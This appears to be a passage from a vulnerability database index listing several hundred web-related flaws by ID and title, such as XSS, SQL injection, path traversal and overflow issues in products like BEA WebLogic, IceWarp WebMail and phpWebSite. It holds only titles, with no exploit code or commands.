MySQL MaxDB webdbm Server Field DoS [10522] IBM DB2 Application Programming Interface Multiple Unspecified Overflow [10505] ColdFusion Server Web Publish Example Script Access Restriction Bypass [10489] NetworkActiv Web Server Encoded URL Request Remote DoS [10469] PlanetDNS PlanetWeb HTTP Method Overflow [10468] PlanetDNS PlanetWeb URL Overflow [10448] WebTrends Reporting Center WTX_REMOTE.DLL /reports/ Remote Overflow [10447] WebTrends Reporting Center get_od_toc.pl Path Disclosure [10442] MyWebServer ServerProperties.html Arbitrary File Access [10441] MyWebServer Multiple HTTP Connection DoS [10423] Hosting Controller browsewebalizerexe.asp filepath Variable Arbitrary Directory Browsing [10403] Novell NetMail ModWeb Remote Overflow [10402] Novell NetMail WebAdmin Remote Overflow [10355] Web Wiz Internet Search Engine search_engine.mdb Admin Password Disclosure [10354] Web Wiz Journal journal.mdb Admin Password Disclosure [10353] Web Wiz Internet Search Engine common.inc Admin Password Disclosure [10350] Full Revolution aspWebCalendar User Enumeration [10342] BEA WebLogic NodeManager Admin Privilege Escalation [10341] BEA WebLogic Server DOS Device Request DoS [10340] BEA WebLogic Server Internal Servlet Admin Authentication Bypass [10335] Full Revolution aspWebAlbum album.asp SQL Injection [10334] Full Revolution aspWebCalendar calendar.asp SQL Injection [10321] Zope ZSearch Interface Query String XSS [10269] Hummingbird CyberDOCS DM Web Server loginact.asp Path Disclosure [10215] PostNuke CMS Web Links Module admin.php Path Disclosure [10187] mySAP Web Dispatcher HTTP Host Header Remote Overflow [10127] Microsoft SQL Server xp_runwebtask Procedure Privilege Escalation [10112] CafeLog b2 Weblog Tool tablehosts Parameter SQL Injection [10082] Novell WebServer Examples Toolkit 2 files.pl Arbitrary File Access [10067] BEA WebLogic Double Dot GET Request Remote Overflow [10066] phpWebLog common.inc.php $CONF Array Password Weakening [10059] WebRamp M3 Router Telnet / HTTP Service Persistence [10039] DNS4Me Web Server GET Request Overflow DoS [10018] Business Objects InfoView for WebIntelligence File Upload Document Name XSS [10017] Business Objects InfoView for WebIntelligence Options Pane Personalized Picture XSS [10016] Business Objects WebIntelligence Restriction Bypass Arbitrary Document Deletion [10015] BEA WebLogic JNDI Tree Object Unbinding DoS [10014] BEA WebLogic JNDI Tree Object Information Disclosure [10013] BEA WebLogic Administrative ant Task Cleartext Password Disclosure [10012] BEA WebLogic command-line Utilities Cleartext Password Disclosure [9978] BEA WebLogic Cleartext Administrative Information Transmission [9977] BEA WebLogic Active Directory LDAP Account Lockout Bypass [9976] BEA WebLogic Deployment Descriptor Policy/Role Failure [9975] BEA WebLogic HTTP Header Version Information Disclosure [9974] BEA WebLogic on Linux Command Line Admin Password Disclosure [9973] BEA WebLogic web.xml URL Case Restriction Bypass [9972] BEA WebLogic weblogic.Admin Arbitrary Command Execution [9860] Excite for Web Servers Encrypted Password Weakness [9859] Excite for Web Servers Architext.conf Encrypted Password Disclosure Local Privilege Escalation [9858] Excite for Web Servers Architext.conf Permission Weakness Privilege Escalation [9829] Savant Web Server HTTP GET Request Remote Overflow [9826] Behold! Software Web Page Counter counter.exe Malformed HTTP Request Counter Log DoS [9814] IceWarp WebMail folders.html Arbitrary File/Directory Rename [9813] IceWarp WebMail viewaction.html Arbitrary File/Directory Move [9812] IceWarp WebMail viewaction.html Arbitrary File Deletion [9811] IceWarp WebMail accountsettings_add.html Arbitrary File Creation [9810] IceWarp WebMail attachment.html Arbitrary E-mail Attachment Access [9809] IceWarp WebMail topmenu.html Path Disclosure [9808] IceWarp WebMail accountsettings_add.html Path Disclosure [9807] IceWarp WebMail viewaction.html Arbitrary Direction Creation [9806] IceWarp WebMail search.html Search String Parameter XSS [9805] IceWarp WebMail accountsettings.html User Name Parameter XSS [9791] iPROSITE Web Shop Manager Search Command Execution [9782] Falcon Web Server Long Filename Path Disclosure [9775] Webmin/Usermin Installation .webmin Symlink Local Privilege Escalation [9767] WebRamp Web Administration Utility Default Password [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure [9681] IBM Informix Web DataBlade Input Filtering Weakness SQL Injection [9680] IBM Informix Web DataBlade webdriver HTTP Request SQL Injection [9679] IBM WebSphere Application Server (WAS) sas.server.props Cleartext Password Disclosure [9677] IBM WebSphere/NetCommerce3 macro.d2w Macro Parsing Remote DoS [9676] IBM WebSphere/NetCommerce3 macro.d2w Macro Path Disclosure [9675] IBM WebSphere Plugin Host Header Request JSP Source Disclosure [9666] IBM WebSphere ikeyman Database Password Storage Encryption Weakness [9665] IBM WebSphere Script Permission Privilege Escalation [9617] HP-UX iPlanet Web Server with VirtualVault HTTPS Remote DoS [9554] Ipswitch IMail Web Messaging To: Line DoS [9553] Ipswitch IMail Web Calendar Malformed Content DoS [9548] ICQ Webserver Traversal Arbitrary File Access [9544] ICQ WebFront Plug-in Malformed URL DoS [9539] ICQ Web Front HTTPd Malformed URL Parsing Remote DoS [9538] ICQ Web Front Service guestbook CGI URL Long Name DoS [9497] Postaci Webmail PostgreSQL Version deletecontact.php item_id Parameter SQL Injection [9479] Oracle Applications Web Report Review FNDWRR.exe URL Overflow [9464] Oracle Web Cache Admin Module Multiple GET Request Method DoS [9462] Oracle Application Server Web Cache webcached Local Privilege Escalation [9461] Oracle Application Server Web Cache /webcache/webcache.xml Encrypted Password Local Disclosure [9447] phpWebSite Administrator Forced Command Execution [9446] phpWebSite Notes Module Multiple Field Script Injection [9445] phpWebSite Comment Module CM_pid XSS [9444] phpWebSite Calendar Module cal_template Parameter SQL Injection [9416] Oracle Web Listener Hex Encoded URL Authentication Bypass [9414] Oracle Webserver Configuration File Ownership Weakness [9413] Oracle Webserver PL/SQL Stored Procedure GET Request DoS [9411] Oracle Application Server Web Cache Multiple Period Request webcached DoS [9404] D-Link DP-300 Web Server POST Request DoS [9391] Xedus Webserver Traversal Arbitrary File Access [9390] Xedus Webserver testgetrequest.x username Parameter XSS [9389] Xedus Webserver TestServer.x username Parameter XSS [9388] Xedus Webserver test.x username Parameter XSS [9387] Xedus Webserver Connection Saturation DoS [9357] Web Server Running In Unrestricted File System [9333] Open UNIX/UnixWare webtop service_action.cgi -c Argument Privilege Escalation [9332] Open UNIX/UnixWare webtop scoadminreg.cgi -c Argument Handling Local Privilege Escalation [9278] News-TNK WEB Parameter XSS [9277] Board-TNK WEB Parameter XSS [9274] Dynix Webpac Unspecified SQL Injection [9252] ASP-Nuke profile.asp Web Site URL XSS [9249] Novell Web Search search Parameter XSS [9241] Webmin/Usermin Authentication Error Page XSS [9240] Critical Path inJoin iCon Admin Web Server Multiple Parameter XSS [9225] IBM Web Traffic Express Caching Proxy Server Location: Header XSS [9220] Sun ONE/iPlanet Web Server Admin Server Error Log XSS [9219] CafeLog b2 Weblog Tool GPC Parameter XSS [9175] Easy File Sharing Web Server HTTP Request Saturation DoS [9174] Easy File Sharing Web Server disk_c Virtual Folder Request Arbitrary File Access [9164] web-app.org WebAPP index.cgi Traversal Arbitrary File Access [9151] Webmatic Unspecified Security Issues [9105] Davenport WebDAV-CIFS Gateway XML DoS [9103] Novell NetWare Web Manager Unspecified Issue [9102] Ipswitch IMail Web Calendaring GET DoS [9101] Ipswitch IMail Web Calendaring Content-Length DoS [9099] Nihuo Web Log Analyzer Multiple Header Fields XSS [9062] RealPlayer Web Server Port 1275 Traversal Arbitrary File Access [9055] webMathematica MSPStoreID Parameter Traversal Arbitrary File Access [9050] Essentia Web Server Double Dot Traversal Arbitrary File Access [9045] IceWarp WebMail PHP Source Disclosure [9044] IceWarp WebMail calendar.html schedule Parameter SQL Injection [9043] IceWarp WebMail address.html Path Disclosure [9042] IceWarp WebMail HTML Message Body XSS [9041] IceWarp WebMail calendar.html Multiple Parameter XSS [9040] IceWarp WebMail attachment.html attachmentpage_text_error Parameter XSS [9039] IceWarp WebMail readmail.html folder Parameter XSS [9038] IceWarp WebMail settings.html Multiple Parameter XSS [9037] IceWarp WebMail address.html Multiple Parameter XSS [9008] MyWebServer Invalid Directory Path Disclosure [9001] Dinos Webserver CPU Consumption DoS [8983] Cobalt Qube WebMail readmsg.php mailbox Parameter Traversal Arbitrary File Access [8976] phpMyWebhosting pmwh.php password Parameter SQL Injection [8959] Webmin Directory edit_action.cgi ../ Sequence Parsing Traversal Arbitrary File Access [8956] Basilix Webmail basilix.php3 request_id[DUMMY] Parameter Traversal Arbitrary File Access [8952] Dinos Web Server Encoded URI Request Arbitrary File Access [8946] RadioBird WebServer 4 Everyone Encoded Double Dot Traversal Arbitrary File Access [8942] Novell NetWare Web Handler for Perl Encoded URI Traversal Arbitrary File Access [8934] WebServer 4 Everyone Double Dot Traversal Arbitrary File Access [8908] Cisco VPN 3000 Concentrator HTML Interface Long URL DoS [8850] Cisco ATA 186 Adaptor Web Configuration Remote Parameter Modification [8849] Cisco ATA 186 Adaptor Web Configuration Remote Password Disclosure [8828] Cisco 600 Series Routers Web-based Configuration Utility Persistence [8805] Cisco IOS DFS Subinterface Access Control Bypass [8800] Cisco IOS DFS Interface Switch Access Control Bypass [8786] BackWeb Client Cleartext Proxy Password [8785] Kolban Webcam32 Long URL Overflow [8779] nPULSE Web Server Unspecified Issue [8778] SAP DB Web Agent Administration Overflow [8737] Tarantella Server ttawebtop.cgi Arbitrary Directory Listing [8680] Sun AnswerBook2 Web Server dwhttpd shell metacharacters Remote Command Execution [8679] Sun AnswerBook2 Web Server dwhttpd Arbitrary Account Creation [8597] Clearswift MIMEsweeper for Web Arbitrary File Access [8552] IceWarp WebMail WebAdmin autoresp.html Unspecified Issue [8551] IceWarp WebMail EmailLogin Issue [8547] IceWarp WebMail Web Admin User Password Disclosure [8544] IceWarp Web Mail Unspecified Login Issue [8543] IceWarp WebMail Address Book Full Name Parameter XSS [8542] IceWarp WebMail selfaction.html Unspecified Issue [8541] IceWarp WebMail Arbitrary Folder/File Manipulation [8540] IceWarp WebMail IP Address Checking Unspecified Issue [8539] IceWarp WebMail No Session ID Multiple Module Execution [8538] IceWarp WebMail calendar.html Multiple Parameter XSS [8537] IceWarp WebMail Unspecified SQL Injection [8536] IceWarp WebMail Arbitrary File/Directory Rename [8535] IceWarp WebMail Arbitrary Unauthenticated File/Directory Moving [8534] IceWarp WebMail Arbitrary File Deletion [8533] IceWarp WebMail Arbitrary Attachment Access [8532] IceWarp WebMail Path Disclosure [8531] IceWarp WebMail Arbitrary Directory Creation [8530] IceWarp WebMail getusersession Unspecified Issue [8529] IceWarp WebMail calendar/note/modify Unspecified Issue [8528] IceWarp WebMail writemail Shortcuts Unspecified Issue [8527] IceWarp WebMail foldertree HTML Validation Issue [8526] IceWarp WebMail Static Session ID Arbitrary Account Hijack [8513] Cobalt RaQ4 Administrative Interface overflow.cgi Command Execution [8419] Bajie HTTP Web Server Remote Arbitrary File Disclosure [8393] EMUMAIL EMU Webmail emumail.cgi XSS [8371] Webbsyte Chat Connection Saturation DoS [8370] Free Web Chat Connection Saturation DoS [8369] Free Web Chat UserManager.java Null Pointer DoS [8361] Kerio MailServer Webmail Unspecified Race Condition [8311] Mozilla Browsers chrome/XML User Interface Spoofing [8264] Hitachi Web Page Generator Error Page XSS [8263] Hitachi Web Page Generator Error Page Remote Information Disclosure [8262] Hitachi Web Page Generator Improper Access Remote DoS [8260] Webcam Watchdog sresult.exe cam Parameter XSS [8197] Sun Java System webapps-simple Application XSS [8193] EasyWeb (EW) FileManager pathext Traversal Arbitrary File / Directory Access [8190] Samba Web Administration Tool (SWAT) HTTP Basic Auth base64 Decoding Remote Overflow [8186] Zeus Technologies Zeus Web Server Weak Encryption [8181] LBE Web HelpDesk jobedit.asp id Parameter SQL Injection [8180] Web+Center DoCustomerOptions.asp Cookie Object SQL Injection [8130] Nucleus Arbitrary Weblog Access [8091] WebKOM HTTP Referrer Session Key Disclosure [8086] 4D WebSTAR Unspecified Web Server Issue [8085] 4D WebSTAR Admin Application Connection Cancel DoS [8084] 4D WebSTAR Admin Application Connection Password Menu DoS [8083] 4D WebSTAR Malformed Search String Remote DoS [8082] 4D WebSTAR Mail LDAP Port Connection Remote DoS [8081] 4D WebSTAR Client Upload Path Overflow DoS [8080] 4D WebSTAR Malformed Query Search DoS [8079] 4D WebSTAR FTP Plug-In Malformed File DoS [8078] 4D WebSTAR Web Page Source Disclosure [8077] 4D WebSTAR Multiple AppleEvent CGI Hit DoS [8066] netcfg Unprivileged Ethernet Interface Access DoS [7958] BasiliX Webmail Content-Type Header XSS [7956] Dr.Web Anti-virus scanMail() Function Unspecified Overflow [7927] Gattaca Server 2003 web.tmpl Multiple Parameter XSS [7924] Gattaca Server 2003 web.tmpl Language Variable CPU Consumption DoS [7906] Microsoft IE WebBrowser ActiveX Object Clipboard Content Disclosure [7900] Microsoft IE WebBrowser Control NavigateComplete2 Policy Bypass [7873] Multiple Browser JavaScript Web Activity Disclosure [7797] 4D WebSTAR Symlink Local Privilege Escalation [7796] 4D WebSTAR php.ini System Information Disclosure [7795] 4D WebSTAR ShellExample.cgi Arbitrary Directory Browsing [7794] 4D WebSTAR Pre-Authentication FTP Overflow [7770] INweb Mail Server Connection Saturation DoS [7725] BRS WebWeaver HTTP Server Double Dot Arbitrary File Access [7717] Conexant Chipset Routers Port 254 Admin Interface Default Password [7715] Way to the Web talkback.cgi article Parameter Traversal Arbitrary File Access [7708] JavaServer Web Dev Kit Request Arbitrary File Access [7706] ITAfrica WEBactive HTTP Server Traversal Arbitrary File Access [7703] BiblioWeb Web Server Double Dot Traversal Arbitrary File Access [7699] Free Java Web Server Double Dot Traversal Arbitrary File Access [7698] HomeSeer Web Server Double Dot Traversal Arbitrary File Access [7694] QNX Voyager Web Server Traversal Arbitrary File Access [7681] WebSecure DFSWeb Configuration Utilities Unspecified [7676] HP Secure Web Console Weak Encryption Issue [7624] iPlanet Web Server Multiple GET Request DoS [7540] OpenBSD Interface Media Configuration Arbitrary Modification [7521] Mambo Open Source Web Links Protected Content Disclosure [7518] Mambo Open Source Web Links Module Path Disclosure [7478] Fastream NETFile Web Server Arbitrary File Manipulation [7474] Open WebMail vacation.pl Arbitrary Command Execution [7472] IBM WebSphere Edge Component Caching JunctionRewrite DoS [7465] IBM Lotus Domino Web Access Message Handling DoS [7463] Netegrity IdentityMinder Management Interface XSS [7461] Webman I-Mall i-mall.cgi Arbitrary Command Execution [7426] Mbedthis AppWeb VirtualHosts HTTPS Authorization Bypass [7425] Mbedthis AppWeb User Message Denial Information Disclosure [7391] Mbedthis AppWeb Mixed Case URL Authorization Bypass [7390] Mbedthis AppWeb Crafted URL Scripting Code Disclosure [7352] MHonArc Web Archive Mail Message XSS [7338] ArGoSoft Mail Server Pro Web Mail XSS [7320] HP-UX WebAdmin Object Action Manager [7310] BEA WebLogic Upper Case Request JSP Source Disclosure [7280] Cart32 c32web.exe GetLatestBuilds XSS [7278] BEA WebLogic Role Interpretation Privilege Escalation [7273] Infinity WEB Login Page Validation Bypass SQL Injection [7223] PHP-Nuke Web_Links Module voteinclude.php Path Disclosure [7214] SqWebMail print_header_uc Header XSS [7189] NETGEAR FVS318 Web Administration Connection DoS [7188] Cisco Linksys BEFSR41 Web Admin Connection DoS [7187] Microsoft MN-500 Web Administration Multiple Connections DoS [7185] Cisco Web Management CBOS Invalid Login Logging Failure [7168] Microsoft Data Access Component Internet Publishing Provider WebDAV Security Zone Bypass [7158] NETGEAR RP114 Web Safe Router WAN Port Scan DoS [7102] Open Webmail IFS Environment Variable Privilege Escalation [7101] Open WebMail openwebmail.pl Information Disclosure [7100] Open WebMail openwebmail-shared.pl Session Parameter Arbitrary Code Execution [7092] Webmatic Unspecified Login Function Access [7086] Web Wiz Forums registration_rules.asp XSS [7081] BEA WebLogic RMI Method Identity Theft [7076] BEA WebLogic SSL Connection DoS [7058] Apple Mac OS X CUPS Web Admin Utility DoS [6996] Webmin Symlink Arbitrary File Overwrite Local Privilege Escalation [6975] Bajie HTTP Web Server test Servlet Path Disclosure [6970] Microsoft ISA Server 2000 Web Publishing Unencrypted Credentials Disclosure [6933] 602Pro LAN SUITE Web Mail index.html XSS [6932] 602Pro LAN SUITE Web Mail Arbitrary Directory Listing [6786] talentsoft Web+ HTTP Cookie Overflow [6785] talentsoft Web+ webplus.dll Long WML Remote Overflow [6784] talentsoft Web+ webplus.exe Long WML Remote Overflow [6783] talentsoft Web+ webpsvc.exe Long URL Remote Overflow [6782] talentsoft Web+ Unspecified ODBC Connection Issue [6781] talentsoft Web+ Unspecified DBInsert BLOB [6780] talentsoft Web+ Unspecified Docroot Script Issue [6779] talentsoft Web+ Log File Information Disclosure [6778] talentsoft Web+ About Page Server Information Disclosure [6777] talentsoft Web+ File Creation Group Ownership Issue [6776] talentsoft Web+ webping.wml Example Application Arbitrary File Access [6775] talentsoft Web+ ::$DATA Stream Request WML Source Disclosure [6774] talentsoft Web+ Error Page Path Disclosure [6773] talentsoft Web+ URL Append WML File Source Disclosure [6772] Xerver Free Web Server Crafted C:/ Request Remote DoS [6771] Xerver Free Web Server Arbitrary Directory Listing [6768] IBM Tivoli Management Framework ManagedNode Web Server GET Request Remote Overflow [6767] IBM Tivoli Management Framework Endpoint Web Server GET Request Remote Overflow [6764] WebStore WSSecurity.pl Traversal Authentication Bypass [6763] WebStore ws_mail.cgi Kill Parameter Arbitrary Command Executions [6754] Symantec Web Security Block Page XSS [6749] Microsoft Crystal Reports Web Viewer crystalimagehandler.aspxArbitrary File Access [6746] SurgeMail/WebMail Login Form XSS [6745] SurgeMail/WebMail Error Message Path Disclosure [6730] Webmin Arbitrary Module Configuration Information Disclosure [6729] Webmin Arbitrary Account Lock DoS [6725] WebzEdit done.jsp message Parameter XSS [6697] WebGUI wobject Arbitrary Information Disclosure [6696] WebGUI Unspecified Obscure Security Issue [6694] Apple Mac OS X Find-By-Content .DS_Store Web Directory Listing [6683] webfs Remote Request-URI Overflow [6673] WebGUI Unspecified Arbitrary Command Execution [6666] HP Instant TopTools GoAhead WebServer hpnst.exe System DoS [6665] Orange Web Server Malformed HTTP Request Remote DoS [6664] GoAhead WebServer /aux Directory Request Parsing Remote DoS [6662] GoAhead WebServer Error Page XSS [6660] MyWebServer GET Request Remote Overflow DoS [6659] MyWebServer Long URL Error Page XSS [6654] Open WebMail openwebmail-abook.pl Session Parameter Arbitrary Code Execution [6632] Allaire JRun web.xml Directory Listing [6620] Caucho Resin WEB-INF Encoded Request Information Disclosure [6594] Linux Kernel iproute Netlink Interface Spoofed Message Local DoS [6549] iWeb Server Double Dot Traversal Arbitrary File Access [6548] iWeb Server 2 Hex Encoded Arbitrary File Access [6547] VisNetic WebSite fcount.exe Server Path Disclosure [6544] SLWebMail ShowGodLog.dll Arbitrary File Access [6518] TinyWEB cgi-bin Crafted HTTP GET Request DoS [6517] TinyWEB cgi-bin Arbitrary File/Directory Access [6470] WebTrends Unrestricted File Credentials Disclosure [6463] WebStore web_store.cgi Information Disclosure [6461] Lysias Lidik Web Server Traversal Arbitrary Directory Listing [6445] WildTangent Web Driver Filename Overflow [6344] TTT-C Edit Panel Script Webmaster Email Parameter XSS [6343] TTT-C Edit Panel Script Webmaster ICQ Parameter XSS [6334] ICQ99 ICQ Web Server Active Homepage File Existence Disclosure [6330] XEROX DocuColor Web Server URL DoS [6296] Kerio MailServer Web Mail Module XSS [6235] Secure Computing Sidewinder G2 Firewall Admin Interface Private Key Export [6230] PHP-Nuke Web_Links Module Multiple Parameter SQL Injection [6223] PHP-Nuke Web_Links Module Full Path Disclosure [6202] Third Voice Web annotation Utility XSS [6157] WebTrends HTTP Server Encoded Space Request Source Code Disclosure [6146] Trend Micro InterScan WebManager HttpSave.dll Overflow [6145] Trend Micro InterScan VirusWall/WebManager RegGo.dll Overflow [6140] Trend Micro Virus Buster cgiWebupdate.exe Arbitrary File Access [6121] Microsoft Outlook Express BASE HREF Web Content Loading [6119] Solaris SMC Web Server File Enumeration [6077] BEA WebLogic Unprivileged Stop/Start [6076] BEA WebLogic weblogic.xml Permission Reversion Weakness [6020] Nokia Voyager Web Admin Server Long URL Overflow [6016] Webcom Guestbook rguest.exe Arbitrary File Access [6015] Webcom Guestbook wguest.exe Arbitrary File Access [5983] MyWeb HTTP GET Request Overflow DoS [5962] Fortinet FortiOS (FortiGate) Firewall Web Filter Log XSS [5926] Squid Web Proxy Cache Authentication Header Forwarding Information Disclosure [5925] Squid Web Proxy Cache msnt_auth Remote Overflow [5881] Aldo's Web Server (aweb) Traversal Arbitrary File Access [5880] AWeb Physical Path Disclosure [5862] Java Web Server Crafted Request CGI Source Disclosure [5823] Allaire Spectra Administration Interface Configuration Access [5798] HP Web JetAdmin ExecuteFile Command Execution [5797] HP Web JetAdmin cache.ini Arbitrary File Write [5796] HP Web JetAdmin obj Parameter XSS [5795] HP Web JetAdmin Framework:CheckPassword Authentication Bypass [5794] HP Web JetAdmin Encrypted Password DoS [5793] HP Web JetAdmin Weak Encryption [5792] HP Web JetAdmin framework.ini Password Disclosure [5791] HP Web JetAdmin framework.ini Path Disclosure [5790] HP Web JetAdmin Trailing . Request Script Source Disclosure [5779] Jana Web Server Hex Encoded Arbitrary File Access [5778] Jana Web Server Arbitrary File Access [5777] Pi3Web CGI Handler Long Parameter Handling Overflow [5752] Web Wiz Forums pop_up_ip_blocking.asp laryCheckedIPAddrID Parameter SQL Injection [5751] Web Wiz Forums pop_up_ip_blocking.asp Arbitrary IP Blocking [5750] Web Wiz Forums pop_up_topic_admin.asp Unauthenticated Title Modification [5737] BEA WebLogic Crafted GET Request Hostname Disclosure [5704] iPlanet Web Server Enterprise Edition URL-encoded Host: Information Disclosure [5702] DiGi Web Server GET Request Handling Remote DoS [5669] Deerfield Website Pro Remote Manager DoS [5648] Multiple Web Server Dangerous HTTP Method TRACK [5647] Multiple Web Server Dangerous HTTP Method MOVE [5646] Multiple Web Server Dangerous HTTP Method DELETE [5633] Microsoft IIS Invalid WebDAV Request DoS [5629] PostNuke Web_Links Module query Parameter XSS [5606] Microsoft IIS WebDAV PROPFIND Request DoS [5599] Viking Web Server Hexidecimal Encoded Arbitrary File Access [5571] BEA WebLogic config.sh Log File Admin Credential Cleartext Disclosure [5570] BEA WebLogic URL Restriction Bypass Information Disclosure [5569] BEA WebLogic Unauthorized Enterprise JavaBean Object Deletion [5557] Microsoft Outlook Web Access With IE Embedded Script Execution [5554] Guardian Digital WebTool Inherited Variable Privilege Escalation [5553] Sybex E-Trainer Web Server Traversal Arbitrary File Access [5548] Fastream NETFile FTP/Web Server Invalid Login DoS [5534] Oracle Application Server Web Cache HTTP Request Overflow [5523] MyWebServer searchTarget Command Execution [5515] PostNuke Web_Links Module Path Disclosure [5507] PostNuke Web_Links Module index.php ttitle Parameter XSS [5492] IBM WebSphere Application Server (WAS) Predictable Session Cookies [5488] NS WebMail Unspecified Security Flaw [5485] SMB Web Client -U Parameter Unspecified Issue [5471] WebCalendar Unspecified Remote Command Execution [5373] Funsoft Dinos Webserver Execute Arbitrary Commands [5371] MDG Computer Services Web Server 4D (WS4D) Cleartext Password Storage [5370] MDG Computer Services Web Server 4D (WS4D)/eCommerce HTTP Request Overflow DoS [5342] Microsoft IE Malformed Web Page Zone Spoofing [5339] HP AdvanceStack Hub Web Config Utility web_access.html Authentication Bypass [5335] Netwin WebNews Webnews.exe Remote Overflow [5325] Novell NetWare Web Server sewse.nlm (viewcode.jse) Traversal Arbitrary File Access [5324] Nombas ScriptEase Mini WebServer comment2.jse Traversal Arbitrary File Access [5299] BEA WebLogic Deleted Group Privilege Escalation [5298] BEA WebLogic 2-way SSL User / Server Impersonation [5297] BEA WebLogic config.xml Password Exposure [5296] BEA WebLogic Internal Method Boot Credential Disclosure [5281] Instant Web Mail write.php Mail Header Modification [5280] Instant Web Mail message.php Execute Arbitrary POP3 Command [5279] WebSight Directory System New Link XSS [5278] Apache Tomcat web.xml Restriction Bypass [5270] EMU Webmail HTTP Host Header Execute Arbitrary Program [5243] Ipswitch IMail Express Web Messaging Buffer Overflow [5237] Abyss Web Server Encoded Traversal Arbitrary File Access [5166] Zope Through The Web Code Header Injection DoS [5161] EMUMAIL EMU Webmail emumail.cgi Traversal Arbitrary File Access [5119] LabVIEW Web Server HTTP Get Newline DoS [5059] NetScreen ScreenOS WebUI Long Username DoS [5055] LocalWEB2000 Crafted Request Access Restriction Bypass [5026] KeyFocus (KF) Web Server Null Character (%00) Request Restricted File / Directory Access [5025] BEA WebLogic Server and Expres Performance Pack Race Condition DoS [5009] Kerio Personal Firewall Web Filtering URL Handling DoS [5006] Open Webmail syshomedir Variable Arbitrary Directory Creation [4990] Ipswitch IMail Web Messaging HTTP GET Request Handling Remote Overflow [4972] EMUMAIL Webmail Login Multiple Parameter XSS [4970] Pi3Web Error Message Path Disclosure [4965] FTGatePro Web Mail message.fts Path Disclosure [4964] FTGatePro Web Mail individual.fts Display Name Field XSS [4963] FTGatePro Web Mail index.fts folder Parameter XSS [4961] F-Secure BackWeb Privilege Escalation [4952] Novell NetWare Enterprise Web Server Information Disclosure [4950] Novell NetWare Enterprise Web Server nsn Module XSS [4949] Novell NetWare Enterprise Web Server webacc Multiple Parameter XSS [4940] SafeWeb File Size Fingerprinting [4937] eMule IRC Module / Web Server DecodeBase16 Function Remote Overflow [4936] MaxWebPortal password.asp Password Reset [4935] MaxWebPortal Default Database Access [4934] MaxWebPortal Cookie Poisoning Account Compromise [4933] MaxWebPortal Start New Topic Hidden Form Field Modification [4932] Microsoft Outlook Web Access SecurID Authentication Bypass [4931] iisPROTECT Admin Interface SiteAdmin.ASP GroupName Parameter SQL Injection [4922] BEA WebLogic SSL Certificate Chain User Impersonation [4915] Microsoft Content Management Server (MCMS) Web Authoring Command File Upload Arbitrary Code Execution [4851] BRS WebWeaver HTTP POST/HEAD Request Overflow [4808] Axis Network Camera Webserver File Creation [4807] Axis Network Camera Webserver File Overwrite [4806] Axis 2400 Network Camera Webserver Message Log Disclosure [4805] Axis Network Camera Webserver DoS [4765] Zeus Technologies Zeus Web Server vs_diag.cgi server Parameter XSS [4741] McAfee WebShield Malformed Outgoing SMTP Recipient Remote DoS [4740] McAfee WebShield SMTP Filter Bypass [4739] McAfee WebShield SMTP MIME Attachments Bypass [4738] McAfee WebShield Attachment Content Filter Bypass [4669] WebCT Campus Edition @import URL Function XSS [4629] Jigsaw Webserver DOS device DoS [4628] Jigsaw Webserver Path Disclosure [4626] Microsoft DirectX Files Viewer xweb.ocx Overflow [4599] Web Wiz Forums Multiple pm_buddy_list.asp XSS [4598] Web Wiz Forums members.asp XSS [4588] Pi3 Web Server Overflow [4560] HP Web JetAdmin HTS File Upload [4559] HP Web JetAdmin setinfo.hts setinclude Parameter Traversal Arbitrary Command Execution [4558] HP Web JetAdmin (hpwebjetd) Malformed Request DoS [4467] Microsoft Windows WebDav ntdll.dll Remote Overflow [4460] XWeb URL Traversal Arbitrary File Download [4404] WatchGuard Firebox SOHO Web Config Server Unauthenticated Access Bypass [4399] Max Web Portal Arbitrary Password Reset [4398] Max Web Portal Database Exposure [4397] Max Web Portal search.asp Search Parameter XSS [4396] Max Web Portal Cookie Poisoning [4395] Max Web Portal Hidden Field Modification [4367] Symantec Firewall Secure Webserver Timeout DoS [4323] noweb Multiple Script Insecure Temporary File Creation [4306] IBM Lotus Domino Server webadmin.nsf Quick Console XSS [4301] NetWin WebNEWS CGI Backdoor Passwords [4255] Pegasi Web Server Error Page XSS [4254] Pegasi Web Server Arbitrary File Access [4253] Novell GroupWise WebAccess Insecure Default Configuration [4249] Oracle Web Cache Unspecified Client Request Handling [4230] CFWebstore index.cfm URL XSS [4229] CFWebstore index.cfm Multiple Parameter SQL Injection [4221] Open Webmail oom Script Privilege Escalation [4204] EMUMAIL Webmail emumail.fcgi Multiple Parameter XSS [4203] EMUMAIL Webmail init.emu Information Disclosure [4201] Open WebMail userstat.pl Arbitrary Command Execution [4191] KorWebLog Arbitrary File Retrieval [4155] PWebServer URL Traversal Arbitrary File Access [4139] Cisco Content Services Switch 11000 Series WebNS DoS [4137] DAWKCo POP3 Server with WebMAIL Extension Session [4136] GWeb HTTP Server Arbitrary File Access [4113] IA WebMail Server Username Overflow [4112] IA WebMail Server DoS [4111] IA WebMail Server XSS [4110] IA WebMail Server User Impersonation [4107] 602Pro LAN SUITE Web Mail Login Form Installation Path Disclosure [4097] EFTP Web Portal Unspecified Admin Privileges [4095] EFTP eftp3users.dat Web Admin Password Stored in Cleartext [4077] Dell OpenManage Web Server HTTP POST Remote Overflow [3996] webfs Directory Creation Pathname Handling Remote Overflow [3995] Webstores 2000 browse_items.asp Search_Text Parameter SQL Injection [3994] Webstores 2000 error.asp XSS [3989] Vizer Web Server Multiple Method Malformed Request DoS [3985] APC SmartSlot Web/SNMP Management Card Default Password [3968] Microsoft FrontPage Personal Web Server Arbitrary File Access [3960] phpWebSite index.php SQL Injection [3959] Minihttp Forum Web Server Arbitrary File Access [3958] Minihttp Forum Web Server Multiple Field XSS [3929] PHP-Nuke Web_Links Module admin Parameter SQL Injection [3910] MaxWebPortal dl_showall.asp sub_name Parameter XSS [3909] MaxWebPortal down.asp HTTP_REFERER XSS [3908] MaxWebPortal Personal Messages SendTo Parameter SQL Injection [3907] MaxWebPortal register Avatar File Name XSS [3869] Webalizer Reverse DNS Lookup Overflow [3868] Webalizer HTTP Referrer Embeded Search Keywords XSS [3854] SkunkWEB handler.py XSS [3853] phpWebSite RSS Feeds Multiple Unspecified Issues [3852] phpWebSite announce Module ANN_id SQL Injection [3850] phpWebSite article.php sid Parameter XSS [3849] phpWebSite Multiple Instance Administrative Privilege [3848] phpWebSite modsecurity.php inc_prefix Parameter Remote File Inclusion [3847] phpWebSite search Module PDA_limit Parameter XSS [3846] phpWebSite pagemaster Module PAGE_id Parameter XSS [3845] phpWebSite fatcat Module fatcat_id Parameter XSS [3844] phpWebSite Calendar 